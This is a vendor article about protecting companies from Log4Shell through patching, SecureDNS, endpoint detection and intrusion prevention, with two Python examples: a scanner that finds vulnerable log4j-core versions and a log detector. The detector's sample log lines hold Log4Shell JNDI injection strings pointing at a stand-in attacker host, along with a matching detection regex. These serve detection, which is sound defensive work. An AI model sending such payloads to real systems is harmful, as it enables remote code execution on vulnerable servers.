How to protect a company from Log4Shell and other zero-day vulnerabilities?

Dan Verbruggen AXS Guard

With these three solutions, you’ll be better protected against similar zero-day vulnerabilities

A serious vulnerability in a widely used open-source library for Java has been putting the global IT landscape on edge since early December 2021.

What exactly was and is going on?

Log4Shell is a zero-day vulnerability that affects the popular Apache package Log4j (published as CVE-2021-44228 as of Dec. 9, 2021). Using specially crafted requests, attackers can gain control over devices or computers running certain versions of Log4j. The Apache Software Foundation, which maintains the Log4j 2 library, gave this vulnerability a CVSS score of 10 out of 10, the highest possible severity rating.

Are you along for the ride? Or late?

In the meantime, fortunately, several successive patches have been released and, of course, it is always advisable to install them immediately. Unfortunately, patching alone does not get you all the way there.

In fact, there are some other issues you need to address. Do you know if and where Log4j is being used in your organization? Have you or the manufacturer patched everything with the very latest version?
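The two inventory questions above can be answered with a file system scan. The following is an added example, not AXS Guard's tooling: it walks a directory tree, finds log4j-core inside jars and inside archives embedded in WAR/EAR files, reads the version from the library's Maven pom.properties, and reports whether JndiLookup.class is still shipped. The version threshold and the two sample archives built by demo() are constructed assumptions; take the real threshold from the Apache advisory for your environment.

```python
import io, os, tempfile, zipfile
from typing import Iterator, List, NamedTuple, Tuple

# Marker entries inside a log4j-core archive (paths as shipped by the real artifact).
POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVES = (".jar", ".war", ".ear")

class Finding(NamedTuple):
    path: str                 # nested archives are reported as outer.war!inner.jar
    version: Tuple[int, ...]
    has_jndi_lookup: bool     # JndiLookup.class still present (not stripped as a mitigation)
    outdated: bool            # version below the threshold the caller supplies

def parse_version(text: str) -> Tuple[int, ...]:
    return tuple(int(p) for p in text.strip().split(".") if p.isdigit())

def inspect_archive(zf: zipfile.ZipFile, path: str, min_safe: Tuple[int, ...]) -> Iterator[Finding]:
    names = set(zf.namelist())
    if POM in names:
        props = zf.read(POM).decode("utf-8", "replace").splitlines()
        ver = next((parse_version(p.split("=", 1)[1]) for p in props if p.startswith("version=")), ())
        yield Finding(path, ver, JNDI_CLASS in names, ver < min_safe)  # unknown version () counts as outdated
    for name in names:  # recurse into embedded archives: fat jars, WARs, EARs
        if name.endswith(ARCHIVES):
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                yield from inspect_archive(inner, f"{path}!{name}", min_safe)

def scan(root: str, min_safe: Tuple[int, ...]) -> List[Finding]:
    found: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for full in (os.path.join(dirpath, f) for f in files if f.endswith(ARCHIVES)):
            if zipfile.is_zipfile(full):  # skip stray files that only carry the extension
                with zipfile.ZipFile(full) as zf:
                    found.extend(inspect_archive(zf, full, min_safe))
    return sorted(found)

def demo() -> List[Finding]:
    """Constructed fixture: an old log4j-core jar plus a newer copy nested inside a WAR."""
    root = tempfile.mkdtemp()
    def core(version: str, with_jndi: bool) -> bytes:  # builds a minimal fake log4j-core jar
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM, f"version={version}\n")
            if with_jndi:
                z.writestr(JNDI_CLASS, b"")
        return buf.getvalue()
    with open(os.path.join(root, "app.jar"), "wb") as fh:
        fh.write(core("2.14.1", True))
    with zipfile.ZipFile(os.path.join(root, "service.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core.jar", core("2.17.1", False))
    return scan(root, (2, 17, 1))  # threshold is an assumption: use the release named in the advisory
```

Run scan() against application, container and backup paths, not just the obvious servers, since the WAR case above is where vendor-shipped copies usually hide.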

And perhaps the most important question, aren’t you already too late? Hackers these days are known to take their time and quietly monitor their “targets” for several weeks and dig deeper into the organization before unleashing their ransomware and holding the company hostage.

Hacked, but you don’t know it yet?

Therefore, it is recommended to implement some other solutions that will guarantee you better security and at least detect if any unauthorized actions are going on. After all, if you have been hacked and you don’t know it, you won’t be able to do anything about it either. Alex Ongena, CEO of Belgian AXS Guard advises, “By thinking in cyber security layers, you are better protected as an enterprise against similar zero-day attacks. Each layer makes it harder to exploit vulnerabilities undetected, and new technologies with AI are making that increasingly difficult.”

Activate SecureDNS to block malicious domains quickly and automatically

All communications, including those of attackers and malware, use DNS, the protocol that allows computers to figure out which IP address belongs to a particular host or domain.

Through a SecureDNS service, all DNS requests are checked against special databases and suspicious and malicious domains are immediately identified and blocked.

Vulnerabilities like Log4Shell behave no differently in this regard. When a Log4j application is attacked, the exploit forces the target to “dial back” to a particular URL. An attacker can then abuse that URL to pass certain commands that are then executed on the vulnerable computer.

Because the domains and IP addresses in these callback URLs are malicious, they are immediately recognized and blocked by SecureDNS, ultimately causing the attack to fail.

Detecting abnormal activity with AI and Endpoint Security (EDR)

Endpoint Detection & Response (EDR) is a very small application, called an agent, that is installed on every device in your organization (computers, laptops, servers, mobile devices) and provides full visibility of your IT infrastructure through its central management interface.

It works in real time and uses a series of advanced techniques to quickly detect and stop abnormal activity, including exploitation of the Log4Shell vulnerability, which abuses the Log4j Java Naming and Directory Interface (JNDI) lookup to initiate requests to a malicious server controlled by an attacker on the Internet.

Log4j is a globally used library. Given the simplicity of the exploit, it unfortunately makes large-scale attacks possible. Although the exploit is simple to execute on its own, additional steps are required for the attacker to gain a foothold.

AI-driven Endpoint Security, such as ReaQta’s EDR at AXS Guard, provides insight into unexpected application behavior, such as that caused by a Log4j exploit, and automatically blocks any unusual activity that occurs during the post-exploitation phase of a cyberattack.

Intrusion Prevention System

Intrusion Prevention System (IPS) is a system that focuses on prevention. The system identifies potential vulnerabilities and takes immediate action when an attack occurs.

An IPS uses preprocessors and a set of dynamic rules that are updated automatically. These rules are divided into classes. To protect your network from Log4Shell at the IPS level, activate the Log4Shell-specific rules in the IPS on your firewall and then monitor via the reporting tool which attacks are being blocked.
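What the IPS rules and the dial-back described earlier both key on is the lookup string that Log4j hands to JNDI. As an added example, not the IPS's or AXS Guard's own rules, the detector below parses web server lines in the common "combined" format and checks every attacker-controlled field (request line, Referer, User-Agent) for that string, reporting which field carried it and which protocol it named. The log lines, client addresses and attacker.example domain are constructed.

```python
import re
from typing import List, NamedTuple, Optional

# Apache/nginx "combined" log format. Request line, Referer and User-Agent are all
# attacker-controlled and all end up in application logs, so every field is inspected.
COMBINED = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Log4j lookup that is handed to JNDI; case-insensitive and tolerant of inner whitespace.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)", re.IGNORECASE)

class Hit(NamedTuple):
    client: str
    field: str     # which logged field carried the lookup string
    scheme: str    # protocol the lookup names (ldap, rmi, dns, ...)
    status: int    # a 200 here does not mean the attempt failed

def inspect_line(line: str) -> Optional[Hit]:
    m = COMBINED.match(line)
    if not m:
        return None  # unparseable line: route to a separate queue in a real pipeline
    for field in ("request", "referer", "agent"):
        j = JNDI.search(m.group(field))
        if j:
            return Hit(m.group("client"), field, j.group("scheme").lower(), int(m.group("status")))
    return None

def scan_log(lines: List[str]) -> List[Hit]:
    return [h for h in (inspect_line(l) for l in lines) if h]

# Constructed sample: one clean request, one lookup in the URI, one hidden in the User-Agent.
SAMPLE = [
    '203.0.113.7 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:10:00:02 +0000] "GET /login?user=${jndi:ldap://attacker.example/a} HTTP/1.1" 200 77 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Dec/2021:10:00:03 +0000] "POST /api HTTP/1.1" 500 0 "-" "${JNDI:rmi://attacker.example/b}"',
]
```

A hit on a client that then appears in outbound DNS or LDAP traffic from the same server is the correlation the layered approach in this article is after.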

Internet security is thus thinking in layers

The hacker uses more than one system, combining various technologies. Therefore, it is also necessary to build your defense in several layers.

In addition to immediately installing all the patches offered by the various manufacturers, it is necessary to remain alert and, above all, to act preventively. Besides automatically monitoring all Internet traffic at the DNS level with SecureDNS, monitoring abnormal behavior on all computers and servers via Endpoint Security is also a must. Finally, intrusion prevention stops attacks and reports what happened.

That this is a complex story is obvious. Large companies have the people and resources to secure themselves. For SMBs, systems like the AXS Guard firewall, with the various technologies built in and working together, are a better choice. You then have all the tools to apply a uniform, affordable and manageable security policy, in layers.


This is a submitted contribution from Dan Verbruggen, Sales & Marketing Director at AXS Guard. For more information on the company’s security solutions, please visit here.
